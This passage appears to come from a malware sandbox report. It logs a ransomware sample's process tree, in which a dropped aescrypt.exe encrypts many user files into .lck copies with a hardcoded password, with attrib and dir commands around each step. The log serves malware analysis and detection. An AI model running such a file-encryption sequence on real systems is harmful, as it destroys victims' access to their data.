C:\Windows\system32\attrib.exeattrib +r "These.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Are.docx.lck" "Are.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Are.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Recently.docx.lck" "Recently.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Recently.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Opened.docx.lck" "Opened.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Opened.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Files.docx.lck" "Files.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Files.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugRestart.dot.lck" "DebugRestart.dot"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "DebugRestart.dot.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectSend.dotm.lck" "UnprotectSend.dotm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectSend.dotm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnprotectConnect.rtf.lck" "UnprotectConnect.rtf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnprotectConnect.rtf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectInitialize.pptm.lck" "ProtectInitialize.pptm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ProtectInitialize.pptm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddInvoke.docm.lck" "AddInvoke.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "AddInvoke.docm.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RedoConnect.html.lck" "RedoConnect.html"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RedoConnect.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendUnlock.xps.lck" "SendUnlock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "SendUnlock.xps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmRestart.vsx.lck" "ConfirmRestart.vsx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmRestart.vsx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeEdit.pub.lck" "RevokeEdit.pub"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RevokeEdit.pub.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMeasure.vdx.lck" "NewMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NewMeasure.vdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockUninstall.pdf.lck" "UnblockUninstall.pdf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnblockUninstall.pdf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TestDismount.vsw.lck" "TestDismount.vsw"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "TestDismount.vsw.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeFind.xlt.lck" "InvokeFind.xlt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeCompress.pptx.lck" "InvokeCompress.pptx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InvokeFind.xlt.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +r "InvokeCompress.pptx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchRemove.docm.lck" "SearchRemove.docm"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "SearchRemove.docm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeEdit.vdx.lck" "InitializeEdit.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InitializeEdit.vdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestExport.vsd.lck" "RequestExport.vsd"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RequestExport.vsd.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutGroup.vsdx.lck" "OutGroup.vsdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "OutGroup.vsdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearMeasure.vdx.lck" "ClearMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ClearMeasure.vdx.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveWait.ico.lck" "ReceiveWait.ico"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveWait.ico.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnregisterOptimize.xps.lck" "UnregisterOptimize.xps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnregisterOptimize.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveImport.php.lck" "ApproveImport.php"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ApproveImport.php.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteRename.xlt.lck" "WriteRename.xlt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteRename.xlt.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceInitialize.ppsm.lck" "TraceInitialize.ppsm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceInitialize.ppsm.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopRemove.scf.lck" "PopRemove.scf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PopRemove.scf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockBlock.lock.lck" "UnlockBlock.lock"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnlockBlock.lock.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertUnprotect.potm.lck" "ConvertUnprotect.potm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertUnprotect.potm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisableDismount.html.lck" "DisableDismount.html"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisableDismount.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UseDisconnect.ppsx.lck" "UseDisconnect.ppsx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UseDisconnect.ppsx.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectSave.vst.lck" "ConnectSave.vst"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectSave.vst.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMove.dib.lck" "NewMove.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "NewMove.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterSave.ocx.lck" "RegisterSave.ocx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RegisterSave.ocx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetLimit.pptx.lck" "GetLimit.pptx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "GetLimit.pptx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeOpen.wdp.lck" "InvokeOpen.wdp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "InvokeOpen.wdp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockResume.xlt.lck" "UnblockResume.xlt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnblockResume.xlt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.wmv.lck" "TraceRead.wmv"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.wmv.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendExpand.wmf.lck" "SendExpand.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SendExpand.wmf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectApprove.xlsx.lck" "ConnectApprove.xlsx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectApprove.xlsx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RemoveDisconnect.vstx.lck" "RemoveDisconnect.vstx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RemoveDisconnect.vstx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResetWait.css.lck" "ResetWait.css"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResetWait.css.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartEnable.shtml.lck" "StartEnable.shtml"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "StartEnable.shtml.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PushClear.mpe.lck" "PushClear.mpe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PushClear.mpe.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddMove.jpg.lck" "AddMove.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "AddMove.jpg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameConvertFrom.midi.lck" "RenameConvertFrom.midi"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RenameConvertFrom.midi.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDismount.DVR-MS.lck" "RevokeDismount.DVR-MS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDismount.DVR-MS.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveDisable.nfo.lck" "ApproveDisable.nfo"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ApproveDisable.nfo.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishSelect.otf.lck" "PublishSelect.otf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PublishSelect.otf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncConfirm.svg.lck" "SyncConfirm.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SyncConfirm.svg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SavePing.vst.lck" "SavePing.vst"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SavePing.vst.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditWrite.pub.lck" "EditWrite.pub"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EditWrite.pub.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RecentPlaces.lnk.lck" "RecentPlaces.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RecentPlaces.lnk.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Desktop.lnk.lck" "Desktop.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Desktop.lnk.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Downloads.lnk.lck" "Downloads.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Downloads.lnk.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupUnpublish.docx.lck" "BackupUnpublish.docx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BackupUnpublish.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFromDismount.asp.lck" "ConvertFromDismount.asp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFromDismount.asp.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CopyStop.cfg.lck" "CopyStop.cfg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CopyStop.cfg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EnableSelect.vb.lck" "EnableSelect.vb"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EnableSelect.vb.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditUnprotect.ttc.lck" "EditUnprotect.ttc"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EditUnprotect.ttc.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeLock.pps.lck" "MergeLock.pps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MergeLock.pps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeSkip.exe.lck" "MergeSkip.exe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MergeSkip.exe.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OptimizeOpen.htm.lck" "OptimizeOpen.htm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OptimizeOpen.htm.lck"3⤵
-
